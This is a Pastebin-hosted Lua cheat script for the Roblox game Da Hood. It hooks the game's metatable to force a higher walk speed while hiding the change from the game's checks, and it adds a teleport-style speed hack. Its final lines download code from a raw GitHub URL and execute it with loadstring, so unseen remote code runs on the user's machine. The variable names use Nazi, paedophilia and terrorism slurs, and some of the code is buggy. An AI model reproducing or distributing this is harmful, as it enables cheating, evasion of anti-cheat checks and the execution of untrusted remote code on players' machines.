Advertisement
creativenico

Da Hood Fake Macro Script

Jun 11th, 2024
4,981
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.42 KB | None | 0 0
  1. repeat wait() until game:IsLoaded()
  2.  
  3.  
  4.  
  5. getgenv().Fix = true
  6.  
  7.  
  8.  
  9. getgenv().TeclasWS = {
  10.  
  11. ["tecla1"] = "M", -- speed +5
  12.  
  13. ["tecla2"] = "N", -- speed -5
  14.  
  15. ["tecla3"] = "T" -- toggle
  16.  
  17. }
  18.  
  19.  
  20.  
  21.  
  22.  
  23.  
  24.  
  25. -- // servicios
  26.  
  27. local MININOS_DOXXEADOS = game:GetService("Players")
  28.  
  29. local AUDIOS_LOUD_DE_TRAP = game:GetService("StarterGui") or "son una mierda"
  30.  
  31.  
  32.  
  33. -- // objetos
  34.  
  35. local neonazi = MININOS_DOXXEADOS.LocalPlayer
  36.  
  37. local esvastica = neonazi:GetMouse()
  38.  
  39.  
  40.  
  41. -- // variables
  42.  
  43. local lista_de_victimas_de_drizzy = getrenv()._G
  44.  
  45. local da_hood_rblxm_REAL = getrawmetatable(game)
  46.  
  47. local CP = da_hood_rblxm_REAL.__newindex
  48.  
  49. local CP_DE_DRIZZY = da_hood_rblxm_REAL.__index
  50.  
  51. local velocidad_de_cum = 122
  52.  
  53. local es_pedofilo = true
  54.  
  55.  
  56.  
  57. -- // funciones para acortar codigo :]
  58.  
  59. function anunciar_atentado_terrorista(fecha_del_atentado)
  60.  
  61. AUDIOS_LOUD_DE_TRAP:SetCore("SendNotification",{
  62.  
  63. Title="Xlazui#2571",
  64.  
  65. Text=fecha_del_atentado,
  66.  
  67. Icon="rbxthumb://type=Asset&id=1332213374&w=150&h=150"
  68.  
  69. })
  70.  
  71. end
  72.  
  73.  
  74.  
  75.  
  76.  
  77. getgenv().TECHWAREWALKSPEED_LOADED = true
  78.  
  79.  
  80.  
  81.  
  82.  
  83. wait(1.5)
  84.  
  85.  
  86.  
  87.  
  88.  
  89. anunciar_atentado_terrorista("Welcome"..TeclasWS.tecla3.."")
  90.  
  91.  
  92.  
  93. -- // conexión
  94.  
  95. esvastica.KeyDown:Connect(function(el_impostor)
  96.  
  97. if el_impostor:lower() == TeclasWS.tecla1:lower() then
  98.  
  99. velocidad_de_cum = velocidad_de_cum + 1
  100.  
  101. anunciar_atentado_terrorista(" (speed = "..tostring(velocidad_de_cum)..")")
  102.  
  103. elseif el_impostor:lower() == TeclasWS.tecla2:lower() then
  104.  
  105. velocidad_de_cum = velocidad_de_cum - 1
  106.  
  107. anunciar_atentado_terrorista(" (speed = "..tostring(velocidad_de_cum)..")")
  108.  
  109. elseif el_impostor:lower() == TeclasWS.tecla3:lower() then
  110.  
  111. if es_pedofilo then
  112.  
  113. es_pedofilo = false
  114.  
  115. anunciar_atentado_terrorista("speed off")
  116.  
  117. else
  118.  
  119. es_pedofilo = true
  120.  
  121. anunciar_atentado_terrorista("speed on")
  122.  
  123. end
  124.  
  125. end
  126.  
  127. end)
  128.  
  129.  
  130.  
  131. -- // mi parte favorita: metametodos
  132.  
  133. setreadonly(da_hood_rblxm_REAL,false)
  134.  
  135. da_hood_rblxm_REAL.__index = newcclosure(function(BEST_ON_TOP,IS_GARBAGE)
  136.  
  137. local esPedofilo = checkcaller()
  138.  
  139. if IS_GARBAGE == "WalkSpeed" and not esPedofilo then
  140.  
  141. return lista_de_victimas_de_drizzy.CurrentWS
  142.  
  143. end
  144.  
  145. return CP_DE_DRIZZY(BEST_ON_TOP,IS_GARBAGE)
  146.  
  147. end)
  148.  
  149. da_hood_rblxm_REAL.__newindex = newcclosure(function(kaias,ip,logger)
  150.  
  151. local unNeonazi = checkcaller()
  152.  
  153. if es_pedofilo then
  154.  
  155. if ip == "WalkSpeed" and logger ~= 0 and not unNeonazi then
  156.  
  157. return CP(kaias,ip,velocidad_de_cum)
  158.  
  159. end
  160.  
  161. end
  162.  
  163. return CP(kaias,ip,logger)
  164.  
  165. end)
  166.  
  167. setreadonly(da_hood_rblxm_REAL,true)
  168.  
  169.  
  170.  
  171. repeat wait() until game:IsLoaded()
  172.  
  173. local Players = game:service('Players')
  174.  
  175. local Player = Players.LocalPlayer
  176.  
  177.  
  178.  
  179. repeat wait() until Player.Character
  180.  
  181.  
  182.  
  183. local userInput = game:service('UserInputService')
  184.  
  185. local runService = game:service('RunService')
  186.  
  187.  
  188.  
  189. local Multiplier = -0.22
  190.  
  191. local Enabled = false
  192.  
  193. local whentheflashnoiq
  194.  
  195.  
  196.  
  197. userInput.InputBegan:connect(function(Key)
  198.  
  199. if Key.KeyCode == Enum.KeyCode.LeftBracket then
  200.  
  201. Multiplier = Multiplier + 0.01
  202.  
  203. print(Multiplier)
  204.  
  205. wait(0.2)
  206.  
  207. while userInput:IsKeyDown(Enum.KeyCode.LeftBracket) do
  208.  
  209. wait()
  210.  
  211. Multiplier = Multiplier + 0.01
  212.  
  213. print(Multiplier)
  214.  
  215. end
  216.  
  217. end
  218.  
  219.  
  220.  
  221. if Key.KeyCode == Enum.KeyCode.RightBracket then
  222.  
  223. Multiplier = Multiplier - 0.01
  224.  
  225. print(Multiplier)
  226.  
  227. wait(0.2)
  228.  
  229. while userInput:IsKeyDown(Enum.KeyCode.RightBracket) do
  230.  
  231. wait()
  232.  
  233. Multiplier = Multiplier - 0.01
  234.  
  235. print(Multiplier)
  236.  
  237. end
  238.  
  239. end
  240.  
  241.  
  242.  
  243. if Key.KeyCode == Enum.KeyCode.P then
  244.  
  245. Enabled = not Enabled
  246.  
  247. if Enabled == true then
  248.  
  249. repeat
  250.  
  251. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame + game.Players.LocalPlayer.Character.Humanoid.MoveDirection * Multiplier
  252.  
  253. game:GetService("RunService").Stepped:waitn()
  254.  
  255. until Enabled == true
  256.  
  257. end
  258.  
  259. end
  260.  
  261. end)
  262.  
  263.  
  264.  
  265. if Fix == true then
  266.  
  267. loadstring(game:HttpGet("https://raw.githubusercontent.com/youtubetutorials123/helo/main/123"))()
  268.  
  269. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement